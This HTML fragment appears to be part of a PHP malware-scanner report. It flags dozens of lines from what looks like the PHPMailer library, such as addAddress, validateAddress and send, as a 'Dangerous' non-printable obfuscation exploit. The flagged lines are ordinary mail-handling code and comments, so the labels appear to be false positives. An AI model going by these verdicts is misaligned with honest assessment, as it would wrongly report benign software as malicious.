</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
